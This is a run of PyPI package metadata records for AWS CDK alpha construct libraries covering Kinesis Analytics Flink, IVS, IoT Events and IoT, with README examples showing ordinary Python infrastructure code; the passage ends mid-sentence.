use `fromAsset` as shown above to reference a local jar file, or 
`fromBucket` to reference a file in s3. ```python flink.Application(stack, "App", code=flink.ApplicationCode.from_bucket(bucket, file_key), runtime=flink.Runtime.FLINK_1_19 ) ``` The `propertyGroups` property provides a way of passing arbitrary runtime properties to your Flink application. You can use the aws-kinesisanalytics-runtime library to [retrieve these properties](https://docs.aws.amazon.com/kinesisanalytics/latest/java/how-properties.html#how-properties-access). ```python # bucket: s3.Bucket flink_app = flink.Application(self, "Application", property_groups={ "FlinkApplicationProperties": { "input_stream_name": "my-input-kinesis-stream", "output_stream_name": "my-output-kinesis-stream" } }, # ... runtime=flink.Runtime.FLINK_1_20, code=flink.ApplicationCode.from_bucket(bucket, "my-app.jar") ) ``` Flink applications also have specific configuration for passing parameters when the Flink job starts. These include parameters for checkpointing, snapshotting, monitoring, and parallelism. ```python # bucket: s3.Bucket flink_app = flink.Application(self, "Application", code=flink.ApplicationCode.from_bucket(bucket, "my-app.jar"), runtime=flink.Runtime.FLINK_1_20, checkpointing_enabled=True, # default is true checkpoint_interval=Duration.seconds(30), # default is 1 minute min_pause_between_checkpoints=Duration.seconds(10), # default is 5 seconds log_level=flink.LogLevel.ERROR, # default is INFO metrics_level=flink.MetricsLevel.PARALLELISM, # default is APPLICATION auto_scaling_enabled=False, # default is true parallelism=32, # default is 1 parallelism_per_kpu=2, # default is 1 snapshots_enabled=False, # default is true log_group=logs.LogGroup(self, "LogGroup") ) ``` Flink applications can optionally be deployed in a VPC: ```python # bucket: s3.Bucket # vpc: ec2.Vpc flink_app = flink.Application(self, "Application", code=flink.ApplicationCode.from_bucket(bucket, "my-app.jar"), runtime=flink.Runtime.FLINK_1_20, vpc=vpc ) ```
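At runtime, a property group such as `FlinkApplicationProperties` reaches the application as a mapping of group id to key/value pairs. The stdlib sketch below models that lookup; the JSON shape here is illustrative only and is not the exact wire format consumed by the aws-kinesisanalytics-runtime library:

```python
import json

def get_property_group(config_json: str, group_id: str) -> dict:
    """Sketch of a property-group lookup: parse the group mapping and
    return the key/value pairs for one group (empty dict if absent)."""
    groups = json.loads(config_json)
    return groups.get(group_id, {})
```

In a real Flink job you would call the runtime library instead; this only shows how the `propertyGroups` values declared in the CDK surface as a nested mapping.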
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:08.090656
aws_cdk_aws_kinesisanalytics_flink_alpha-2.239.0a0.tar.gz
117,776
e2/b3/44732e4ba52f5d0fc8de77264e8872994045bfb1d331588baee9800b2609/aws_cdk_aws_kinesisanalytics_flink_alpha-2.239.0a0.tar.gz
source
sdist
null
false
c65ddbf601b9a5e7da0866f37780cbd4
37826888de69fdabd6442b97b2107362fbcad341da0dc9eeaecb4ccfce8d5b33
e2b344732e4ba52f5d0fc8de77264e8872994045bfb1d331588baee9800b2609
null
[]
0
2.1
aws-cdk.aws-ivs-alpha
2.239.0a0
The CDK Construct Library for AWS::IVS
# AWS::IVS Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> Amazon Interactive Video Service (Amazon IVS) is a managed live streaming solution that is quick and easy to set up, and ideal for creating interactive video experiences. Send your live streams to Amazon IVS using streaming software and the service does everything you need to make low-latency live video available to any viewer around the world, letting you focus on building interactive experiences alongside the live video. You can easily customize and enhance the audience experience through the Amazon IVS player SDK and timed metadata APIs, allowing you to build a more valuable relationship with your viewers on your own websites and applications. This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project. ## Channels An Amazon IVS channel stores configuration information related to your live stream. You first create a channel and then contribute video to it using the channel’s stream key to start your live stream. You can create a channel: ```python my_channel = ivs.Channel(self, "Channel") ``` You can use the Advanced Channel type by setting the `type` property to `ivs.ChannelType.ADVANCED_HD` or `ivs.ChannelType.ADVANCED_SD`. 
Additionally, when using the Advanced Channel type, you can set the `preset` property to `ivs.Preset.CONSTRAINED_BANDWIDTH_DELIVERY` or `ivs.Preset.HIGHER_BANDWIDTH_DELIVERY`. For more information, see [Amazon IVS Streaming Configuration](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/streaming-config.html). ```python my_channel = ivs.Channel(self, "myChannel", type=ivs.ChannelType.ADVANCED_HD, preset=ivs.Preset.CONSTRAINED_BANDWIDTH_DELIVERY ) ``` If you want to use RTMP ingest, set the `insecureIngest` property to `true`. By default, `insecureIngest` is `false`, which means RTMPS ingest is used. **⚠ Note:** RTMP ingest might result in reduced security for your streams. AWS recommends that you use RTMPS for ingest, unless you have specific and verified use cases. For more information, see [Encoder Settings](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/streaming-config.html#streaming-config-settings). ```python my_rtmp_channel = ivs.Channel(self, "myRtmpChannel", type=ivs.ChannelType.STANDARD, insecure_ingest=True ) ``` ### Multitrack Video Multitrack video is a new, low-latency streaming paradigm supported by Amazon Interactive Video Service (IVS) and services that use Amazon IVS. You can use Multitrack Video by setting the `multitrackInputConfiguration` property. Multitrack Video requires both a STANDARD Channel and Fragmented Mp4. For more information, see [Amazon IVS Multitrack Video](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/multitrack-video.html). 
```python ivs.Channel(self, "ChannelWithMultitrackVideo", type=ivs.ChannelType.STANDARD, container_format=ivs.ContainerFormat.FRAGMENTED_MP4, multitrack_input_configuration=ivs.MultitrackInputConfiguration( maximum_resolution=ivs.MaximumResolution.HD, policy=ivs.Policy.ALLOW ) ) ``` ### Importing an existing channel You can reference an existing channel, for example, if you need to create a stream key for an existing channel: ```python my_channel = ivs.Channel.from_channel_arn(self, "Channel", my_channel_arn) ``` ## Stream Keys A Stream Key is used by a broadcast encoder to initiate a stream and identify to Amazon IVS which customer and channel the stream is for. If you are storing this value, it should be treated as if it were a password. You can create a stream key for a given channel: ```python my_stream_key = my_channel.add_stream_key("StreamKey") ``` ## Private Channels Amazon IVS offers the ability to create private channels, allowing you to restrict your streams by channel or viewer. You control access to video playback by enabling playback authorization on channels and generating signed JSON Web Tokens (JWTs) for authorized playback requests. A playback token is a JWT that you sign (with a playback authorization key) and include with every playback request for a channel that has playback authorization enabled. In order for Amazon IVS to validate the token, you need to upload the public key that corresponds to the private key you use to sign the token. ```python key_pair = ivs.PlaybackKeyPair(self, "PlaybackKeyPair", public_key_material=my_public_key_pem_string ) ``` Then, when creating a channel, specify the `authorized` property: ```python my_channel = ivs.Channel(self, "Channel", authorized=True ) ``` ## Recording Configurations An Amazon IVS Recording Configuration stores settings that specify how a channel's live streams should be recorded. You can configure video quality, thumbnail generation, and where recordings are stored in Amazon S3. 
For more information about IVS recording, see [IVS Auto-Record to Amazon S3 | Low-Latency Streaming](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/record-to-s3.html). You can create a recording configuration: ```python # create an S3 bucket for storing recordings recording_bucket = s3.Bucket(self, "RecordingBucket") # create a basic recording configuration recording_configuration = ivs.RecordingConfiguration(self, "RecordingConfiguration", bucket=recording_bucket ) ``` ### Renditions of a Recording When you stream content to an Amazon IVS channel, auto-record-to-s3 uses the source video to generate multiple renditions. For more information, see [Discovering the Renditions of a Recording](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/record-to-s3.html#r2s3-recording-renditions). ```python # recording_bucket: s3.Bucket recording_configuration = ivs.RecordingConfiguration(self, "RecordingConfiguration", bucket=recording_bucket, # set rendition configuration rendition_configuration=ivs.RenditionConfiguration.custom([ivs.Resolution.HD, ivs.Resolution.SD]) ) ``` ### Thumbnail Generation You can enable or disable the recording of thumbnails for a live session and modify the interval at which thumbnails are generated for the live session. Thumbnail intervals may range from 1 second to 60 seconds; by default, thumbnail recording is enabled, at an interval of 60 seconds. For more information, see [Thumbnails](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/record-to-s3.html#r2s3-thumbnails). 
```python # recording_bucket: s3.Bucket recording_configuration = ivs.RecordingConfiguration(self, "RecordingConfiguration", bucket=recording_bucket, # set thumbnail settings thumbnail_configuration=ivs.ThumbnailConfiguration.interval(ivs.Resolution.HD, [ivs.Storage.LATEST, ivs.Storage.SEQUENTIAL], Duration.seconds(30)) ) ``` ### Merge Fragmented Streams The `recordingReconnectWindow` property allows you to specify a window of time (in seconds) during which, if your stream is interrupted and a new stream is started, Amazon IVS tries to record to the same S3 prefix as the previous stream. In other words, if a broadcast disconnects and then reconnects within the specified interval, the multiple streams are considered a single broadcast and merged together. For more information, see [Merge Fragmented Streams](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/record-to-s3.html#r2s3-merge-fragmented-streams). ```python # recording_bucket: s3.Bucket recording_configuration = ivs.RecordingConfiguration(self, "RecordingConfiguration", bucket=recording_bucket, # set recording reconnect window recording_reconnect_window=Duration.seconds(60) ) ``` ### Attaching Recording Configuration to a Channel To enable recording for a channel, specify the recording configuration when creating the channel: ```python # recording_configuration: ivs.RecordingConfiguration channel = ivs.Channel(self, "Channel", # set recording configuration recording_configuration=recording_configuration ) ```
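The merge behavior behind `recordingReconnectWindow` can be modeled in a few lines of plain Python. This is an illustrative sketch of the windowing logic only; Amazon IVS performs this grouping server-side:

```python
def merge_streams(segments, reconnect_window_s):
    """Group (start, end) stream segments into broadcasts: a segment that
    starts within reconnect_window_s seconds of the previous segment's end
    is merged into the same broadcast (hypothetical helper)."""
    merged = []
    for start, end in sorted(segments):
        if merged and start - merged[-1][1] <= reconnect_window_s:
            # reconnect within the window: extend the previous broadcast
            merged[-1] = (merged[-1][0], max(merged[-1][1], end))
        else:
            merged.append((start, end))
    return merged
```

For example, with a 60-second window, a stream interrupted at t=100 and resumed at t=130 is treated as one broadcast, while a stream resumed 200 seconds later starts a new one.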
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:07.332836
aws_cdk_aws_ivs_alpha-2.239.0a0.tar.gz
99,275
ce/5b/28d3de00b4408eb4df947290efd8582854cce0470a533ca41337142de11d/aws_cdk_aws_ivs_alpha-2.239.0a0.tar.gz
source
sdist
null
false
dd5ec74f093f657ebb60c0b769dabafa
f829b8b82384971d6dbbf999f4f3e98ff81bdd2ba218b6df07000312cc7c1a07
ce5b28d3de00b4408eb4df947290efd8582854cce0470a533ca41337142de11d
null
[]
0
2.1
aws-cdk.aws-iotevents-alpha
2.239.0a0
The CDK Construct Library for AWS::IoTEvents
# AWS::IoTEvents Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> AWS IoT Events enables you to monitor your equipment or device fleets for failures or changes in operation, and to trigger actions when such events occur. ## `DetectorModel` The following example adds an AWS IoT Events detector model to your stack. The detector model needs a reference to at least one AWS IoT Events input. AWS IoT Events inputs enable the detector to get MQTT payload values from IoT Core rules. You can define built-in actions to use a timer or set a variable, or send data to other AWS resources. See also [@aws-cdk/aws-iotevents-actions-alpha](https://docs.aws.amazon.com/cdk/api/v2/docs/aws-iotevents-actions-alpha-readme.html) for other actions. 
```python import aws_cdk.aws_iotevents_alpha as iotevents import aws_cdk.aws_iotevents_actions_alpha as actions import aws_cdk.aws_lambda as lambda_ # func: lambda.IFunction input = iotevents.Input(self, "MyInput", input_name="my_input", # optional attribute_json_paths=["payload.deviceId", "payload.temperature"] ) warm_state = iotevents.State( state_name="warm", on_enter=[iotevents.Event( event_name="test-enter-event", condition=iotevents.Expression.current_input(input), actions=[actions.LambdaInvokeAction(func)] )], on_input=[iotevents.Event( # optional event_name="test-input-event", actions=[actions.LambdaInvokeAction(func)])], on_exit=[iotevents.Event( # optional event_name="test-exit-event", actions=[actions.LambdaInvokeAction(func)])] ) cold_state = iotevents.State( state_name="cold" ) # transition to coldState when temperature is less than 15 warm_state.transition_to(cold_state, event_name="to_coldState", # optional property, default is generated by combining the names of the States when=iotevents.Expression.lt( iotevents.Expression.input_attribute(input, "payload.temperature"), iotevents.Expression.from_string("15")), executing=[actions.LambdaInvokeAction(func)] ) # transition to warmState when temperature is greater than or equal to 15 cold_state.transition_to(warm_state, when=iotevents.Expression.gte( iotevents.Expression.input_attribute(input, "payload.temperature"), iotevents.Expression.from_string("15")) ) iotevents.DetectorModel(self, "MyDetectorModel", detector_model_name="test-detector-model", # optional description="test-detector-model-description", # optional property, default is none evaluation_method=iotevents.EventEvaluation.SERIAL, # optional property, default is iotevents.EventEvaluation.BATCH detector_key="payload.deviceId", # optional property, default is none and single detector instance will be created and all inputs will be routed to it initial_state=warm_state ) ``` To grant permissions to put messages in the input, you can use the `grantWrite()` method: 
```python import aws_cdk.aws_iam as iam import aws_cdk.aws_iotevents_alpha as iotevents # grantable: iam.IGrantable input = iotevents.Input.from_input_name(self, "MyInput", "my_input") input.grant_write(grantable) ```
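The warm/cold detector above boils down to a small state machine. The toy re-implementation below captures only the semantics of the two `transition_to` calls (it is not the IoT Events runtime; the class name is hypothetical):

```python
class Detector:
    """Toy model of the warm/cold detector: one instance per detector
    key, transitioning on the payload.temperature attribute."""
    def __init__(self, initial_state: str = "warm"):
        self.state = initial_state

    def on_input(self, payload: dict) -> str:
        temp = payload["temperature"]
        if self.state == "warm" and temp < 15:
            self.state = "cold"   # the to_coldState transition
        elif self.state == "cold" and temp >= 15:
            self.state = "warm"
        return self.state
```

Because `detector_key="payload.deviceId"` is set in the example, IoT Events effectively maintains one such instance per device id.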
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:06.485573
aws_cdk_aws_iotevents_alpha-2.239.0a0.tar.gz
93,771
99/b4/9786bc0f0a5231fcaaa5ee5ca7adbf0a2b677d908aee2a16a82bcce5edb3/aws_cdk_aws_iotevents_alpha-2.239.0a0.tar.gz
source
sdist
null
false
34aade08ea69a96726f6a74447fdbed8
827ee4b4b0e47548f2ad1f4e062a964004e0c65d7413d56ac0e950ad44c5b022
99b49786bc0f0a5231fcaaa5ee5ca7adbf0a2b677d908aee2a16a82bcce5edb3
null
[]
0
2.1
aws-cdk.aws-iotevents-actions-alpha
2.239.0a0
Receipt Detector Model actions for AWS IoT Events
# Actions for AWS::IoTEvents Detector Model <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This library contains integration classes to specify actions of state events of Detector Model in `@aws-cdk/aws-iotevents-alpha`. Instances of these classes should be passed to `State` defined in `@aws-cdk/aws-iotevents-alpha`. You can define built-in actions to use a timer, set a variable, or send data to other AWS resources. AWS IoT Events can trigger actions when it detects a specified event or transition event. Currently supported are: * Use timer * Set variable to detector instance * Invoke a Lambda function ## Use timer The code snippet below creates an Action that creates a timer with a duration in seconds. ```python import aws_cdk as cdk 
import aws_cdk.aws_iotevents_alpha as iotevents import aws_cdk.aws_iotevents_actions_alpha as actions # input: iotevents.IInput state = iotevents.State( state_name="MyState", on_enter=[iotevents.Event( event_name="test-event", condition=iotevents.Expression.current_input(input), actions=[ actions.SetTimerAction("MyTimer", duration=cdk.Duration.seconds(60) ) ] )] ) ``` Setting duration by [IoT Events Expression](https://docs.aws.amazon.com/iotevents/latest/developerguide/iotevents-expressions.html): ```python # fragment: assumes the imports and `input` from the previous example actions.SetTimerAction("MyTimer", duration_expression=iotevents.Expression.input_attribute(input, "payload.durationSeconds") ) ``` And the timer can be reset and cleared. Below is an example of a general [Device HeartBeat](https://docs.aws.amazon.com/iotevents/latest/developerguide/iotevents-examples-dhb.html) Detector Model: ```python import aws_cdk as cdk import aws_cdk.aws_iotevents_alpha as iotevents import aws_cdk.aws_iotevents_actions_alpha as actions # input: iotevents.IInput online = iotevents.State( state_name="Online", on_enter=[iotevents.Event( event_name="enter-event", condition=iotevents.Expression.current_input(input), actions=[ actions.SetTimerAction("MyTimer", duration=cdk.Duration.seconds(60) ) ] )], on_input=[iotevents.Event( event_name="input-event", condition=iotevents.Expression.current_input(input), actions=[ actions.ResetTimerAction("MyTimer") ] )], on_exit=[iotevents.Event( event_name="exit-event", actions=[ actions.ClearTimerAction("MyTimer") ] )] ) offline = iotevents.State(state_name="Offline") online.transition_to(offline, when=iotevents.Expression.timeout("MyTimer")) offline.transition_to(online, when=iotevents.Expression.current_input(input)) ``` ## Set variable to detector instance The code snippet below creates an Action that sets a variable on the detector instance when it is triggered. 
```python import aws_cdk.aws_iotevents_alpha as iotevents import aws_cdk.aws_iotevents_actions_alpha as actions # input: iotevents.IInput state = iotevents.State( state_name="MyState", on_enter=[iotevents.Event( event_name="test-event", condition=iotevents.Expression.current_input(input), actions=[ actions.SetVariableAction("MyVariable", iotevents.Expression.input_attribute(input, "payload.temperature")) ] )] ) ``` ## Invoke a Lambda function The code snippet below creates an Action that invokes a Lambda function when it is triggered. ```python import aws_cdk.aws_iotevents_alpha as iotevents import aws_cdk.aws_iotevents_actions_alpha as actions import aws_cdk.aws_lambda as lambda_ # input: iotevents.IInput # func: lambda.IFunction state = iotevents.State( state_name="MyState", on_enter=[iotevents.Event( event_name="test-event", condition=iotevents.Expression.current_input(input), actions=[actions.LambdaInvokeAction(func)] )] ) ```
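The Online/Offline timer pattern in the Device HeartBeat model can be simulated in plain Python: set a timer on enter, reset it on every message, and fall back to Offline when it expires. This is a toy model of the semantics, not the IoT Events service; the class name is hypothetical:

```python
class HeartbeatDetector:
    """Toy model of the heartbeat pattern: SetTimerAction on enter,
    ResetTimerAction on each input, timeout transitions to Offline."""
    def __init__(self, timeout_s: int = 60):
        self.timeout_s = timeout_s
        self.state = "Offline"
        self.deadline = None

    def on_message(self, now_s: float) -> str:
        self.state = "Online"
        self.deadline = now_s + self.timeout_s  # set/reset the timer
        return self.state

    def tick(self, now_s: float) -> str:
        if self.state == "Online" and now_s >= self.deadline:
            self.state = "Offline"  # timer expired with no heartbeat
        return self.state
```

Each incoming message pushes the deadline forward, mirroring how `ResetTimerAction` keeps a healthy device in the Online state.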
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "aws-cdk.aws-iotevents-alpha==2.239.0.a0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:05.644629
aws_cdk_aws_iotevents_actions_alpha-2.239.0a0.tar.gz
53,936
95/ae/32bc804a852f0cb1d56615fa0c3377d4125e0c8b407fc9619b132b5502ab/aws_cdk_aws_iotevents_actions_alpha-2.239.0a0.tar.gz
source
sdist
null
false
eccb8c95dba9f8784d48655a085dcb9b
6dc5fba6054b971938447b44a359a3fa6693fd0da92d0414efcb412ccc72b030
95ae32bc804a852f0cb1d56615fa0c3377d4125e0c8b407fc9619b132b5502ab
null
[]
0
2.1
aws-cdk.aws-iot-alpha
2.239.0a0
The CDK Construct Library for AWS::IoT
# AWS IoT Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> AWS IoT Core lets you connect billions of IoT devices and route trillions of messages to AWS services without managing infrastructure. ## `TopicRule` Create a topic rule that gives your devices the ability to interact with AWS services. You can create a topic rule with an action that invokes a Lambda function, as follows: ```python func = lambda_.Function(self, "MyFunction", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_inline(""" exports.handler = (event) => { console.log("It is test for lambda action of AWS IoT Rule.", event); };""") ) iot.TopicRule(self, "TopicRule", topic_rule_name="MyTopicRule", # optional description="invokes the lambda function", # optional sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp FROM 'device/+/data'"), actions=[actions.LambdaFunctionAction(func)] ) ``` Or, you can add an action after constructing the `TopicRule` instance, as follows: ```python # func: lambda.Function topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp FROM 'device/+/data'") ) topic_rule.add_action(actions.LambdaFunctionAction(func)) ``` You can also supply `errorAction`, and the IoT Rule will trigger it 
if a rule's action fails to perform: ```python import aws_cdk.aws_logs as logs log_group = logs.LogGroup(self, "MyLogGroup") iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp FROM 'device/+/data'"), error_action=actions.CloudWatchLogsAction(log_group) ) ``` If you want to disable the topic rule, set the `enabled` property to `false`, as follows: ```python iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp FROM 'device/+/data'"), enabled=False ) ``` See also [@aws-cdk/aws-iot-actions-alpha](https://docs.aws.amazon.com/cdk/api/v2/docs/aws-iot-actions-alpha-readme.html) for other actions. ## Logging AWS IoT provides a [logging feature](https://docs.aws.amazon.com/iot/latest/developerguide/configure-logging.html) that allows you to monitor and log AWS IoT activity. You can enable IoT logging with the following code: ```python iot.Logging(self, "Logging", log_level=iot.LogLevel.INFO ) ``` **Note**: All logs are forwarded to the `AWSIotLogsV2` log group in CloudWatch. ## Audit An [AWS IoT Device Defender audit](https://docs.aws.amazon.com/iot-device-defender/latest/devguide/device-defender-audit.html) looks at account- and device-related settings and policies to ensure security measures are in place. An audit can help you detect any drifts from security best practices or access policies. ### Account Audit Configuration The IoT audit includes [various audit checks](https://docs.aws.amazon.com/iot-device-defender/latest/devguide/device-defender-audit-checks.html), and it is necessary to configure settings to enable those checks. 
You can enable an account audit configuration with the following code: ```python # Audit notifications are sent to the SNS topic # target_topic: sns.ITopic iot.AccountAuditConfiguration(self, "AuditConfiguration", target_topic=target_topic ) ``` By default, all audit checks are enabled, but it is also possible to enable only specific audit checks. ```python iot.AccountAuditConfiguration(self, "AuditConfiguration", check_configuration=iot.CheckConfiguration( # enabled authenticated_cognito_role_overly_permissive_check=True, # enabled by default ca_certificate_expiring_check=None, # disabled ca_certificate_key_quality_check=False, conflicting_client_ids_check=False, device_certificate_age_check=False, device_certificate_expiring_check=False, device_certificate_key_quality_check=False, device_certificate_shared_check=False, intermediate_ca_revoked_for_active_device_certificates_check=False, io_tPolicy_potential_mis_configuration_check=False, iot_policy_overly_permissive_check=False, iot_role_alias_allows_access_to_unused_services_check=False, iot_role_alias_overly_permissive_check=False, logging_disabled_check=False, revoked_ca_certificate_still_active_check=False, revoked_device_certificate_still_active_check=False, unauthenticated_cognito_role_overly_permissive_check=False ) ) ``` To configure [the device certificate age check](https://docs.aws.amazon.com/iot-device-defender/latest/devguide/device-certificate-age-check.html), you can specify the duration for the check: ```python from aws_cdk import Duration iot.AccountAuditConfiguration(self, "AuditConfiguration", check_configuration=iot.CheckConfiguration( device_certificate_age_check=True, # The default value is 365 days # Valid values range from 30 days (minimum) to 3650 days (10 years, maximum) device_certificate_age_check_duration=Duration.days(365) ) ) ``` ### Scheduled Audit You can create a [scheduled 
audit](https://docs.aws.amazon.com/iot-device-defender/latest/devguide/AuditCommands.html#device-defender-AuditCommandsManageSchedules) that is run at a specified time interval. Checks must be enabled for your account by creating `AccountAuditConfiguration`. ```python # config: iot.AccountAuditConfiguration # Daily audit daily_audit = iot.ScheduledAudit(self, "DailyAudit", account_audit_configuration=config, frequency=iot.Frequency.DAILY, audit_checks=[iot.AuditCheck.AUTHENTICATED_COGNITO_ROLE_OVERLY_PERMISSIVE_CHECK ] ) # Weekly audit weekly_audit = iot.ScheduledAudit(self, "WeeklyAudit", account_audit_configuration=config, frequency=iot.Frequency.WEEKLY, day_of_week=iot.DayOfWeek.SUNDAY, audit_checks=[iot.AuditCheck.CA_CERTIFICATE_EXPIRING_CHECK ] ) # Monthly audit monthly_audit = iot.ScheduledAudit(self, "MonthlyAudit", account_audit_configuration=config, frequency=iot.Frequency.MONTHLY, day_of_month=iot.DayOfMonth.of(1), audit_checks=[iot.AuditCheck.CA_CERTIFICATE_KEY_QUALITY_CHECK ] ) ```
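The `topic(2)` expression used throughout the SQL statements above selects the second segment of the incoming MQTT topic (segments are 1-based). Its behavior can be sketched with a one-line helper; this is an illustrative stand-in, not part of the CDK or the IoT SQL engine:

```python
def topic(n: int, mqtt_topic: str) -> str:
    """Sketch of IoT SQL's topic(n): return the nth (1-based)
    slash-separated segment of the incoming MQTT topic."""
    return mqtt_topic.split("/")[n - 1]
```

So for a message published to `device/sensor42/data`, the rule's `SELECT topic(2) as device_id` yields the device identifier in the middle segment.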
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:03.527597
aws_cdk_aws_iot_alpha-2.239.0a0.tar.gz
118,508
11/4e/485289765ab87e491beecff01ec3de54ac1db7410438773d744f49fe9a11/aws_cdk_aws_iot_alpha-2.239.0a0.tar.gz
source
sdist
null
false
8d6382189e8fd183e3106dd1afbd98bf
184938c599e0d1fa848d05a1660d18d1de145190011624bddd9e613f8427b288
114e485289765ab87e491beecff01ec3de54ac1db7410438773d744f49fe9a11
null
[]
0
2.1
aws-cdk.aws-iot-actions-alpha
2.239.0a0
Receipt rule actions for AWS IoT
# Actions for AWS IoT Rule <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This library contains integration classes to send data to any number of supported AWS Services. Instances of these classes should be passed to `TopicRule` defined in `aws-cdk-lib/aws-iot`. Currently supported are: * Republish a message to another MQTT topic * Invoke a Lambda function * Put objects to an S3 bucket * Put logs to CloudWatch Logs * Capture CloudWatch metrics * Change state for a CloudWatch alarm * Put records to a Kinesis Data stream * Put records to an Amazon Data 